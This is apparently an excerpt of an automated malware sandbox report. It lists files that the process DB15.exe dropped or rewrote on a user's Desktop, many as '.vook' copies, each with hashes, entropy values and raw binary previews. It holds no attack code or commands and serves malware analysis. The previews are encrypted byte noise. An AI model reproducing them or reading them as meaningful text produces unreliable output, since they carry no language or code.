                                                                                                                                                                                                                                      Preview:SQRKH...j.|..y..u;T.<...}.6.. .i...{.j.;zK9..Q.U#.r..HDN...`.....B)2Ke`b..;.\.i.b.%.._..T...(....Akb.j8..jv.cOFBsw.U~..P.H...r....d..n.....M<..R.=..87......+.t..Rb....V...xI.X'qP...>..1.f2z.....5.-..ys1c....|%....j...w:K.u....Y....=...>;.+..S....4s.7..S..KJ.5.....j.f.."..0...cx.`KQ,..?..!M81..0Q.N@U....W|..$.WC./.......!.L*...0U..%~..3..%Iy%.....Nz..6...Q3.A....k.Z0.G.h.w.S.Jq$.K....w_.$.[@...OR..!..oJ.).[...&*...R?:}...*....HD....9.'........b...;......-..kf..].....T..n..G.............1..HN...*..;.%..*|.....l..34.eg-.u0.....,p_'....,..u`.<..6..N{..FtO...........7.j a8......s.W..Z.Iw.GF....g.....=.P..~.r..Dds...;.58...f.......'.$/...U...J%....E..A^=W*)q.:5...8I..lmT-`t...f..'...lG..Pk...^...p.o4.'i.:.4........%X.2=..%...[........=......cQ.FD...(...!W...3..5k<?..|.].i4..._.AU...[...=w..]7...`...>.....f.q...s...=.2X.....6=.@.x...D5.h.V.-...#.A\.U6...g.f.....2.Bw..S..d.pUI....x%..w.V.?v...(T...FT......>.1b>..zgN.)........?........Y..|b.\u..NAc

                                                                                                                                                                                                                                      C:\Users\user\Desktop\SQRKHNBNYN.docx.vook (copy)

                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Local\ff34e5c5-5271-4a45-be37-87b03007a6ce\DB15.exe
                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):1360
                                                                                                                                                                                                                                      Entropy (8bit):7.836439785856781
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:24:nt5KC/6SI+4Jqw3RhV84hLqdxVToH+cIGKWv9J7pA/iwt065XxbiTkbD:t5tNLgV8bHVT0+TaS/oUciD
                                                                                                                                                                                                                                      MD5:B172199C16625F4E978EED7675255E44
                                                                                                                                                                                                                                      SHA1:2A59CB92118B17EB8C35716BA13940CECB40AF6D
                                                                                                                                                                                                                                      SHA-256:FF941B677AF62DB29B14764A43E319573A176D49FE2DE54237F3F7B7C2218E4E
                                                                                                                                                                                                                                      SHA-512:856518DFC7F2E702F6BFDCF130BCFB6F3488A4B611A6A19C02FD477BA7E1CE72F782CD4228859E0C4F147E5B39D3874AAD5DCB3B5140CBD212CCAB0BAB291964
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Preview:SQRKH...j.|..y..u;T.<...}.6.. .i...{.j.;zK9..Q.U#.r..HDN...`.....B)2Ke`b..;.\.i.b.%.._..T...(....Akb.j8..jv.cOFBsw.U~..P.H...r....d..n.....M<..R.=..87......+.t..Rb....V...xI.X'qP...>..1.f2z.....5.-..ys1c....|%....j...w:K.u....Y....=...>;.+..S....4s.7..S..KJ.5.....j.f.."..0...cx.`KQ,..?..!M81..0Q.N@U....W|..$.WC./.......!.L*...0U..%~..3..%Iy%.....Nz..6...Q3.A....k.Z0.G.h.w.S.Jq$.K....w_.$.[@...OR..!..oJ.).[...&*...R?:}...*....HD....9.'........b...;......-..kf..].....T..n..G.............1..HN...*..;.%..*|.....l..34.eg-.u0.....,p_'....,..u`.<..6..N{..FtO...........7.j a8......s.W..Z.Iw.GF....g.....=.P..~.r..Dds...;.58...f.......'.$/...U...J%....E..A^=W*)q.:5...8I..lmT-`t...f..'...lG..Pk...^...p.o4.'i.:.4........%X.2=..%...[........=......cQ.FD...(...!W...3..5k<?..|.].i4..._.AU...[...=w..]7...`...>.....f.q...s...=.2X.....6=.@.x...D5.h.V.-...#.A\.U6...g.f.....2.Bw..S..d.pUI....x%..w.V.?v...(T...FT......>.1b>..zgN.)........?........Y..|b.\u..NAc

                                                                                                                                                                                                                                      C:\Users\user\Desktop\SQRKHNBNYN\IPKGELNTQY.png

                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\DB15.exe
                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):1360
                                                                                                                                                                                                                                      Entropy (8bit):7.854930601373661
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:24:kzyuSYGPuIJyk8Z8nAVSOqxZ9oVdcqwe6nTskmifRGNe+Z6M4Wjs3WRtW0x5ZUuG:kzLGPDJBn4k9Id3we6npNfRy67WmWLOP
                                                                                                                                                                                                                                      MD5:4AB60EF6DCA79B81828C04B1B9FB13EB
                                                                                                                                                                                                                                      SHA1:39950BD56F90481D2B79E1F39F2235C938134AAA
                                                                                                                                                                                                                                      SHA-256:BA1A7A540244A440568DE50B53267680CFF632B2B003B984A102C7F494A17B45
                                                                                                                                                                                                                                      SHA-512:AF2B38E20FC4F9090410E6E776A04BCC2CA34C7EA1CE0EC17DA1D6C7050AE8EF72AF2A5C61CCA9EA6873D05AB50EED1CD5F06065322EB548CB2A9FD470DFAECC
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Preview:IPKGE...U.{^>....._......(......a3.. .@m.$....BB......M....z..Qz.........-W.......7.k.....[mP-...b..L..Z=.....&l(B{.Z.6..C....].[.......W.S..W..0...M.....o.*....Wq.i..w......eR.W...Qr....%..A`;............`<a;[..I..%.m~8F.+...Kye.y.{;.tC.{.!..X..sz.Y....Jn.t.2.1O....@..'....2V..G..f../..:......p.+.>.R<.0SOs.....,..z.....g.m.D..,...%4..!....XvA.Xkq.x\.......k.0.?e.....5...8.L_JQ.....S.}...Sr.>..cY..mE..|.~X.x...m.....Y]w<...k.clx.)......=6..F,.p#.=..\.`8.. l..w...a.y.5.3.5.0*.'`D.y......M..J...._t...>..O\aO.8.db5.d/....z.x....i*f.p....Z4..cq.m.0...^bH...9...Y.L..'.S&.......`~*N...?.Y.....D..X|...k......"[..bD.'...OM]h6...p. .qA..W@Oe..Yax.....B..vm..^q../.....J9.E._.J.......^...C4..h.KO..s....I6......U..~...j....~-0..@.=....W:..2.9.v.CMU.....yJ....a3.5s.BH....m...=j......-1hS..p.x6.wP.E.j.>..I5]..B(.P.i$.c5..}..q..2V....cQ.V.nu...b\...B.~..G..8..(...q*..4.k.em.....X..N6..W.N.c......<...\".....k:"b...y.%..u...C>CO.4.c.v.-@l.

                                                                                                                                                                                                                                      C:\Users\user\Desktop\SQRKHNBNYN\IPKGELNTQY.png.vook (copy)

                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\DB15.exe
                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):1360
                                                                                                                                                                                                                                      Entropy (8bit):7.854930601373661
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:24:kzyuSYGPuIJyk8Z8nAVSOqxZ9oVdcqwe6nTskmifRGNe+Z6M4Wjs3WRtW0x5ZUuG:kzLGPDJBn4k9Id3we6npNfRy67WmWLOP
                                                                                                                                                                                                                                      MD5:4AB60EF6DCA79B81828C04B1B9FB13EB
                                                                                                                                                                                                                                      SHA1:39950BD56F90481D2B79E1F39F2235C938134AAA
                                                                                                                                                                                                                                      SHA-256:BA1A7A540244A440568DE50B53267680CFF632B2B003B984A102C7F494A17B45
                                                                                                                                                                                                                                      SHA-512:AF2B38E20FC4F9090410E6E776A04BCC2CA34C7EA1CE0EC17DA1D6C7050AE8EF72AF2A5C61CCA9EA6873D05AB50EED1CD5F06065322EB548CB2A9FD470DFAECC
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Preview:IPKGE...U.{^>....._......(......a3.. .@m.$....BB......M....z..Qz.........-W.......7.k.....[mP-...b..L..Z=.....&l(B{.Z.6..C....].[.......W.S..W..0...M.....o.*....Wq.i..w......eR.W...Qr....%..A`;............`<a;[..I..%.m~8F.+...Kye.y.{;.tC.{.!..X..sz.Y....Jn.t.2.1O....@..'....2V..G..f../..:......p.+.>.R<.0SOs.....,..z.....g.m.D..,...%4..!....XvA.Xkq.x\.......k.0.?e.....5...8.L_JQ.....S.}...Sr.>..cY..mE..|.~X.x...m.....Y]w<...k.clx.)......=6..F,.p#.=..\.`8.. l..w...a.y.5.3.5.0*.'`D.y......M..J...._t...>..O\aO.8.db5.d/....z.x....i*f.p....Z4..cq.m.0...^bH...9...Y.L..'.S&.......`~*N...?.Y.....D..X|...k......"[..bD.'...OM]h6...p. .qA..W@Oe..Yax.....B..vm..^q../.....J9.E._.J.......^...C4..h.KO..s....I6......U..~...j....~-0..@.=....W:..2.9.v.CMU.....yJ....a3.5s.BH....m...=j......-1hS..p.x6.wP.E.j.>..I5]..B(.P.i$.c5..}..q..2V....cQ.V.nu...b\...B.~..G..8..(...q*..4.k.em.....X..N6..W.N.c......<...\".....k:"b...y.%..u...C>CO.4.c.v.-@l.

                                                                                                                                                                                                                                      C:\Users\user\Desktop\SQRKHNBNYN\MXPXCVPDVN.pdf

                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Local\ff34e5c5-5271-4a45-be37-87b03007a6ce\DB15.exe
                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):1360
                                                                                                                                                                                                                                      Entropy (8bit):7.835765210516109
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:24:1UqQu1IDbRrvD9TMxb0kqQ1COdQw0Cg3gDkRvqEhB2nw4LNf+VobjiTkbD:RmbdvRTC0EJn7s1hUTbWiD
                                                                                                                                                                                                                                      MD5:200B2D46FF07C4E28089ABCBB228FD25
                                                                                                                                                                                                                                      SHA1:257896EDCEEAB96AF079399B1A355CA69BDDC2DE
                                                                                                                                                                                                                                      SHA-256:7C6EE383FE77084846FBAA5C2F18209E9B0BCF02D05EA7DB6E3D94AAA49D59E2
                                                                                                                                                                                                                                      SHA-512:33724866AD03D0188593785EA43EE1BE1E17E85845BE1D7B348CB0A5D71A20BBCA1BA9ED00C8DE7A12B82F3DB0E87CDBE1DD9C08FEAD7608FC9DAE10DCBD2089
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Preview:MXPXC..Y..../.{.x.1.{y...}..@.f%..l..Y3.!..wX./`...4.dwL....G......_X.4..e`..D.qO_z6...A*.V..$...a......d.e..u6......5z....X.h1."..D.T....EY...7..../...JhAP.1...ni@.A.3......7.}@.......zh.dG".}...*...(=v.....|{}.Y..i..v....H...O.ji%*c\.....8.h.....0..~w.f.*.M.Mm._H"j.M....5....t.._.E.z/.!/.Ra...U'......(%....f....oR.e.....R....:..gg.D.y..f........t<y .!k./~Rt{..c...Y..k..r.I..j...:m......S...hvr.t...w.+F.b.k.O[xs.ei;..L"n.kU.......Z.I.-}./....Q.T^Mq.....]....-.S..3:..d.j......e.....<. .-8........C...w_F..;..r..=.:.L.L...06....Q........6/.....{.%.$`.1...v..3c.1.....D. ..%..T1..cc....]..P7..+Nf.uU..|.W..s2.6.0.}..!H..36....."...,q.m[.W..-\.......m.=Tk.......U?..p..o..z".../.H#.<+.hyZ...X......g.B}.R[Gt.Z.....j-d.D.>.v..Y.c....4.`.8.u.+J..|.Xj.3..|?"...{.opi...T.@l}...&d?;.w.{!MG.-Q.........lX`..!.A)..mj..M...h../..A..../.$y.0_.F../d.BJ.._.p.\.._c.....[#K....tb.J.......:....y.T..c......k5.E[Q.k..N1...0..o..i6....Z...F..M.<.....}<z..h...[/.+Yj'.r

                                                                                                                                                                                                                                      C:\Users\user\Desktop\SQRKHNBNYN\MXPXCVPDVN.pdf.vook (copy)

                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Local\ff34e5c5-5271-4a45-be37-87b03007a6ce\DB15.exe
                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):1360
                                                                                                                                                                                                                                      Entropy (8bit):7.835765210516109
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:24:1UqQu1IDbRrvD9TMxb0kqQ1COdQw0Cg3gDkRvqEhB2nw4LNf+VobjiTkbD:RmbdvRTC0EJn7s1hUTbWiD
                                                                                                                                                                                                                                      MD5:200B2D46FF07C4E28089ABCBB228FD25
                                                                                                                                                                                                                                      SHA1:257896EDCEEAB96AF079399B1A355CA69BDDC2DE
                                                                                                                                                                                                                                      SHA-256:7C6EE383FE77084846FBAA5C2F18209E9B0BCF02D05EA7DB6E3D94AAA49D59E2
                                                                                                                                                                                                                                      SHA-512:33724866AD03D0188593785EA43EE1BE1E17E85845BE1D7B348CB0A5D71A20BBCA1BA9ED00C8DE7A12B82F3DB0E87CDBE1DD9C08FEAD7608FC9DAE10DCBD2089
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Preview:MXPXC..Y..../.{.x.1.{y...}..@.f%..l..Y3.!..wX./`...4.dwL....G......_X.4..e`..D.qO_z6...A*.V..$...a......d.e..u6......5z....X.h1."..D.T....EY...7..../...JhAP.1...ni@.A.3......7.}@.......zh.dG".}...*...(=v.....|{}.Y..i..v....H...O.ji%*c\.....8.h.....0..~w.f.*.M.Mm._H"j.M....5....t.._.E.z/.!/.Ra...U'......(%....f....oR.e.....R....:..gg.D.y..f........t<y .!k./~Rt{..c...Y..k..r.I..j...:m......S...hvr.t...w.+F.b.k.O[xs.ei;..L"n.kU.......Z.I.-}./....Q.T^Mq.....]....-.S..3:..d.j......e.....<. .-8........C...w_F..;..r..=.:.L.L...06....Q........6/.....{.%.$`.1...v..3c.1.....D. ..%..T1..cc....]..P7..+Nf.uU..|.W..s2.6.0.}..!H..36....."...,q.m[.W..-\.......m.=Tk.......U?..p..o..z".../.H#.<+.hyZ...X......g.B}.R[Gt.Z.....j-d.D.>.v..Y.c....4.`.8.u.+J..|.Xj.3..|?"...{.opi...T.@l}...&d?;.w.{!MG.-Q.........lX`..!.A)..mj..M...h../..A..../.$y.0_.F../d.BJ.._.p.\.._c.....[#K....tb.J.......:....y.T..c......k5.E[Q.k..N1...0..o..i6....Z...F..M.<.....}<z..h...[/.+Yj'.r

                                                                                                                                                                                                                                      C:\Users\user\Desktop\SQRKHNBNYN\NEBFQQYWPS.mp3

                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Local\ff34e5c5-5271-4a45-be37-87b03007a6ce\DB15.exe
                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):1360
                                                                                                                                                                                                                                      Entropy (8bit):7.819152444790448
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:24:rFCGfQ/mAdxywd9/wniviuIF9UfWx1xkUKMGTzLrHGsWi39zB8kgW6Y+PWTTGZZ1:r9tAdxyGC+IvUfo2rHjWiNzBLZUWTT6H
                                                                                                                                                                                                                                      MD5:9CE8F3150A4ED828CB9B0E84F625C92D
                                                                                                                                                                                                                                      SHA1:DFC5C697445A9DBAFADD401081533A1C8F83F50D
                                                                                                                                                                                                                                      SHA-256:C1472DC19A245EDFF3F7943FA0DC3A4A8F9D81520B81F274481847478CC54ADF
                                                                                                                                                                                                                                      SHA-512:9EB5C0B47A2870A02B09A8525C78A84E97E6270DABA4E266771E500A1A177E03D5D0C4430936A6DBDFBCB12F44C319C02FF6CFC0810001F3BD70367976A6C43D
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Preview:NEBFQ.A{P..o..}......U.*Be.]Xn0J..._..~..e.AE.G...:O{.K.Qg.........o.f.e...w.:P..{L.....<&.I{$.0V.@L.l...B..{(.U.Ej.s.Z..AN......[.......]E.qw%.5...}.9....x.7.+fT...$8.....3.H.......vU....*..xQ.[.....2....rz.._o.x...C......;..mI..R...mb.|.0......ob..._.|.`,.G..q9...9`W..........ROC...B^..9...w..._.Jm....c8.c.....b#...b9....t...|+S.}T ....M{%.D).#.U.;{..S...h.U4z..N.n....?r...|.=@o-.M...v._.o.Ps.......AW......Rk...s..@G ..s'...F..,..Nt.x........$.K.....S\....eDJ._~..../...{.S...h.S.S.S..-Hm.g...s..k`p..qA...^....kU...o../s.S.{........G/....+..K.~.+...Ng.T.I.i-zi.e.1//O..Af..An..'Z.NC|\Y;.......S....m.w6.<..PR..fq.Z@..X.Z....B_m^c....&f....f.P...a.........iM...E.~|l2P...*(.dH..>P.?.'.]e..3..s..;6|.n2.......;!.....l-I.]..._.....td...=..Q`4.8..._R.7..=.1m.....z._q.......u.a!.O5t.fZS..Q_,.l.......~.....L%OH...LJ.........M...'...EB7c....J..{.C5....F...!l...}"J#..f-.=..M..=.#.....r...IW.t...tqRcl.b...<.2..e..6.B....G.....T..nL...a...

                                                                                                                                                                                                                                      C:\Users\user\Desktop\SQRKHNBNYN\NEBFQQYWPS.mp3.vook (copy)

                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Local\ff34e5c5-5271-4a45-be37-87b03007a6ce\DB15.exe
                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):1360
                                                                                                                                                                                                                                      Entropy (8bit):7.819152444790448
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:24:rFCGfQ/mAdxywd9/wniviuIF9UfWx1xkUKMGTzLrHGsWi39zB8kgW6Y+PWTTGZZ1:r9tAdxyGC+IvUfo2rHjWiNzBLZUWTT6H
                                                                                                                                                                                                                                      MD5:9CE8F3150A4ED828CB9B0E84F625C92D
                                                                                                                                                                                                                                      SHA1:DFC5C697445A9DBAFADD401081533A1C8F83F50D
                                                                                                                                                                                                                                      SHA-256:C1472DC19A245EDFF3F7943FA0DC3A4A8F9D81520B81F274481847478CC54ADF
                                                                                                                                                                                                                                      SHA-512:9EB5C0B47A2870A02B09A8525C78A84E97E6270DABA4E266771E500A1A177E03D5D0C4430936A6DBDFBCB12F44C319C02FF6CFC0810001F3BD70367976A6C43D
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Preview:NEBFQ.A{P..o..}......U.*Be.]Xn0J..._..~..e.AE.G...:O{.K.Qg.........o.f.e...w.:P..{L.....<&.I{$.0V.@L.l...B..{(.U.Ej.s.Z..AN......[.......]E.qw%.5...}.9....x.7.+fT...$8.....3.H.......vU....*..xQ.[.....2....rz.._o.x...C......;..mI..R...mb.|.0......ob..._.|.`,.G..q9...9`W..........ROC...B^..9...w..._.Jm....c8.c.....b#...b9....t...|+S.}T ....M{%.D).#.U.;{..S...h.U4z..N.n....?r...|.=@o-.M...v._.o.Ps.......AW......Rk...s..@G ..s'...F..,..Nt.x........$.K.....S\....eDJ._~..../...{.S...h.S.S.S..-Hm.g...s..k`p..qA...^....kU...o../s.S.{........G/....+..K.~.+...Ng.T.I.i-zi.e.1//O..Af..An..'Z.NC|\Y;.......S....m.w6.<..PR..fq.Z@..X.Z....B_m^c....&f....f.P...a.........iM...E.~|l2P...*(.dH..>P.?.'.]e..3..s..;6|.n2.......;!.....l-I.]..._.....td...=..Q`4.8..._R.7..=.1m.....z._q.......u.a!.O5t.fZS..Q_,.l.......~.....L%OH...LJ.........M...'...EB7c....J..{.C5....F...!l...}"J#..f-.=..M..=.#.....r...IW.t...tqRcl.b...<.2..e..6.B....G.....T..nL...a...

                                                                                                                                                                                                                                      C:\Users\user\Desktop\SQRKHNBNYN\SFPUSAFIOL.jpg

                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\DB15.exe
                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):1360
                                                                                                                                                                                                                                      Entropy (8bit):7.835868932258654
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:24:5AqhucJqfh5n5QoyxUa/I8OGRgMStwmYZy2QJ88YGUVidULc6pQ8iR1/XcxQzCLj:+DcJqJ5qoyLu1JQZ1IdULb07vcPWV/dq
                                                                                                                                                                                                                                      MD5:CBBE0ED84E69D474D21140B0D040187F
                                                                                                                                                                                                                                      SHA1:93E1211E10D37439C8ED6CBD382BCED9AB0B0D9E
                                                                                                                                                                                                                                      SHA-256:8B3C0C1A7E74B21F7B98D589F98A791CB4CA6AF7EF33B115FBCBC1B39B914D1D
                                                                                                                                                                                                                                      SHA-512:C554151210D801AB3F33A85F852B1E7D4FE1C24FAE80E398BB2DA1D5A75ECE93469E6ADCC5772C8DCEBCDF8CB47C41CD28D466165FD29924E7230D55A2BF08BC
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Preview:SFPUS.w.||Q.\\|...NV.C-:.$;W;....._C...g...4.H..~.....s*........A.+.........D..h^..;..w......E..K<._~%4.aF...h.T!@.7G9..m<.o.$.vA.Ei..A_.p.:..y.?L\../.....[.N.A.0>...!...0...1.........EX......i.g..&-*...U..':....`R..t%7@.&..".......-....g./weG.H.........'?..vQ|...E..VY......M.....9...9~]..i.w.n.\1..h.6T$A.....a.......h..y..!.].D...N.c.Z..;O...W...2A.K...(>9.5..o.r.YT..z...r.P2{3.g....M.Q.....X..v...I=.jX..C'..Yu.q...`S.s|..u..P...+G.6g.d%.Oe<..A8.$!..J..P.....{A.`.i%DT.-*...Z.....P.'....F45.:.1.|...d..>K.....(}6l.Ar(..1a.&C.B....xT.....gP.....E..Y.c.K.`c..wL.;.H...v....A`s.......K...1...,..7..s.oI~..%.`in... ...Kp+x.~..8.....l.....F.z.?&P0..Q..35.ZA...,-&.-..;....J4....3.*..2..U.O.Vt.......z.....F.Y2v....6....k..x..6.).?..[.@.../.......r`36;0..[......Sc.W.x.y.9...UJ<... .6v....~..9....M.1.&......J..|g.>+......6.4....;....)..........;.^...n._....s.{.x...[........@X....<OL.?#.E..;&.K._.....I......h`..g#3.+-r.q.n...}.:.=_Pq^.a....hU...H

                                                                                                                                                                                                                                      C:\Users\user\Desktop\SQRKHNBNYN\SFPUSAFIOL.jpg.vook (copy)

                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\DB15.exe
                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):1360
                                                                                                                                                                                                                                      Entropy (8bit):7.835868932258654
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:24:5AqhucJqfh5n5QoyxUa/I8OGRgMStwmYZy2QJ88YGUVidULc6pQ8iR1/XcxQzCLj:+DcJqJ5qoyLu1JQZ1IdULb07vcPWV/dq
                                                                                                                                                                                                                                      MD5:CBBE0ED84E69D474D21140B0D040187F
                                                                                                                                                                                                                                      SHA1:93E1211E10D37439C8ED6CBD382BCED9AB0B0D9E
                                                                                                                                                                                                                                      SHA-256:8B3C0C1A7E74B21F7B98D589F98A791CB4CA6AF7EF33B115FBCBC1B39B914D1D
                                                                                                                                                                                                                                      SHA-512:C554151210D801AB3F33A85F852B1E7D4FE1C24FAE80E398BB2DA1D5A75ECE93469E6ADCC5772C8DCEBCDF8CB47C41CD28D466165FD29924E7230D55A2BF08BC
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Preview:SFPUS.w.||Q.\\|...NV.C-:.$;W;....._C...g...4.H..~.....s*........A.+.........D..h^..;..w......E..K<._~%4.aF...h.T!@.7G9..m<.o.$.vA.Ei..A_.p.:..y.?L\../.....[.N.A.0>...!...0...1.........EX......i.g..&-*...U..':....`R..t%7@.&..".......-....g./weG.H.........'?..vQ|...E..VY......M.....9...9~]..i.w.n.\1..h.6T$A.....a.......h..y..!.].D...N.c.Z..;O...W...2A.K...(>9.5..o.r.YT..z...r.P2{3.g....M.Q.....X..v...I=.jX..C'..Yu.q...`S.s|..u..P...+G.6g.d%.Oe<..A8.$!..J..P.....{A.`.i%DT.-*...Z.....P.'....F45.:.1.|...d..>K.....(}6l.Ar(..1a.&C.B....xT.....gP.....E..Y.c.K.`c..wL.;.H...v....A`s.......K...1...,..7..s.oI~..%.`in... ...Kp+x.~..8.....l.....F.z.?&P0..Q..35.ZA...,-&.-..;....J4....3.*..2..U.O.Vt.......z.....F.Y2v....6....k..x..6.).?..[.@.../.......r`36;0..[......Sc.W.x.y.9...UJ<... .6v....~..9....M.1.&......J..|g.>+......6.4....;....)..........;.^...n._....s.{.x...[........@X....<OL.?#.E..;&.K._.....I......h`..g#3.+-r.q.n...}.:.=_Pq^.a....hU...H

                                                                                                                                                                                                                                      C:\Users\user\Desktop\SQRKHNBNYN\SQRKHNBNYN.docx

                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Local\ff34e5c5-5271-4a45-be37-87b03007a6ce\DB15.exe
                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):1360
                                                                                                                                                                                                                                      Entropy (8bit):7.879234401218091
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:24:aNnpBdKTJc+s7lqE5q5CBX0LZKvmuL10BaFF0Ll20vQ9MT79yiTkbD:btL6385CBXsKF40Fa7OM39HiD
                                                                                                                                                                                                                                      MD5:946A47CAFD8AE7A3A5BD5E40771A22AB
                                                                                                                                                                                                                                      SHA1:9BF64273C3B60B81A4AC90A16322D9768C18E140
                                                                                                                                                                                                                                      SHA-256:0B94DFC859B21D06FCAC79BEA50C1465D7304D98B264721407ACEC64EA8674CF
                                                                                                                                                                                                                                      SHA-512:D7BE66C3A907417D555DC655BDC297C0C5DEC1AEB22773304EBC51081C8D3B1EE8D11F7A88D73685BE43D0F8EA1A7A5040E52638D7DB2357948722313998ABFC
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Preview:SQRKHu;P..?R.-....7.8..f.....w..H.?..>...;.L....P...<Ma.~.b...Dx'.p..O.g.Wd9*vI.l..........b........c...G.....8k..l..}}.....~.v.x..3>..i.<.,.r^....;.w.DR.......;......rc..v.@....[[U....]..8...3....._..^."$I....BB....weZ.*&T.s....."..>T.>P....X.'.....^\.....=.I$z.M.H.m.$.Yix...Q..c9.4*.*...v..0<...[.S.7....<..x..>.6...v. .._.:p.Dqv.t..E.x.....H..}.%..d.*T.,.j..<..k,$r).`.y!..:n...5:.!&.Y.Z...}.Q.....`!..+]........:.y.R..AkG..~..J.|..*..F..~.E.R.=.....4......-t}h./.f....a..X.......s. ..1..Y.K.1..F2t.cMg.f.Zy.@..T.....6.a.H.1....,...x~...{S..2O..-.S...{...y?...<0.......!L|...y..:...j|..7.H..A..&....@.f4.\..d.u..'...o,...........F...+L.0%I.l...9.K..........!...U........>.......!...).....{..v.......m#.L..rj.M.T}...-Kv.U;.+..?P.e.B./..[.{...[43..p..s.w...gRd....$......uL ......z~...*..gl..T,..$..{....-..%%....o..S......$.gI............i.o....f....P..'....*-.j..X.L..... .....u.=.x^g.?BE..=0..0:.aV+._J....2.J..y.t..MrX?.,+......A.P..m..D..%m....#

                                                                                                                                                                                                                                      C:\Users\user\Desktop\SQRKHNBNYN\SQRKHNBNYN.docx.vook (copy)

                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Local\ff34e5c5-5271-4a45-be37-87b03007a6ce\DB15.exe
                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):1360
                                                                                                                                                                                                                                      Entropy (8bit):7.879234401218091
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:24:aNnpBdKTJc+s7lqE5q5CBX0LZKvmuL10BaFF0Ll20vQ9MT79yiTkbD:btL6385CBXsKF40Fa7OM39HiD
                                                                                                                                                                                                                                      MD5:946A47CAFD8AE7A3A5BD5E40771A22AB
                                                                                                                                                                                                                                      SHA1:9BF64273C3B60B81A4AC90A16322D9768C18E140
                                                                                                                                                                                                                                      SHA-256:0B94DFC859B21D06FCAC79BEA50C1465D7304D98B264721407ACEC64EA8674CF
                                                                                                                                                                                                                                      SHA-512:D7BE66C3A907417D555DC655BDC297C0C5DEC1AEB22773304EBC51081C8D3B1EE8D11F7A88D73685BE43D0F8EA1A7A5040E52638D7DB2357948722313998ABFC
                                                                                                                                                                                                                                      Malicious:false
